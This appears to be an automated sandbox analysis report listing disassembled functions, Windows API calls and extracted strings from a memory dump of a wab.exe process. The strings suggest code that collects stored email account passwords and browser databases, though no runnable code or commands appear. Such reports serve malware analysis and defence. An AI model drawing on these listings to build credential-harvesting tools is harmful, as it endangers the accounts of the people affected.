                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                                                    • API String ID: 3492281209-168460110
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                    • API String ID: 275601554-2167791130
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_mbscat
                                                                                                                                                                                                                    • String ID: 8D
                                                                                                                                                                                                                    • API String ID: 3951308622-2703402624
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                    • String ID: Password2
                                                                                                                                                                                                                    • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-543337301
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: rows deleted
                                                                                                                                                                                                                    • API String ID: 2221118986-571615504
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: +MA$psow$winOpen
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040269F
                                                                                                                                                                                                                      • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                      • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                      • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C642
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                                                                                      • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B366
                                                                                                                                                                                                                    • atoi.MSVCRT ref: 0040B374
                                                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen
                                                                                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407709
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                                                                                                                                                                                                      • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                                                                                                                                                                                                      • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                                                                                                                                                                                                      • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040776C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1171893557-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00410890
                                                                                                                                                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                                                                                                                                                                                                    • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004108E9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1479990042-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                      • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                                      • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                      • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 203655857-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AB44
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AB5A
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AB84
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                                                    • API String ID: 3699762281-259020660
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ultoasprintf
                                                                                                                                                                                                                    • String ID: %s %s %s
                                                                                                                                                                                                                    • API String ID: 432394123-3850900253
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                      • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                      • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                      • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                      • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: C@
                                                                                                                                                                                                                    • API String ID: 1449862175-3201871010
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409682
                                                                                                                                                                                                                    • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                                                    • String ID: 5\@
                                                                                                                                                                                                                    • API String ID: 568519121-3174280609
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                                                    • String ID: L$ini
                                                                                                                                                                                                                    • API String ID: 714388716-4234614086
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _msizerealloc
                                                                                                                                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                    • String ID: menu_%d
                                                                                                                                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                                                                                    • strrchr.MSVCRT ref: 00409579
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                      • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                      • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
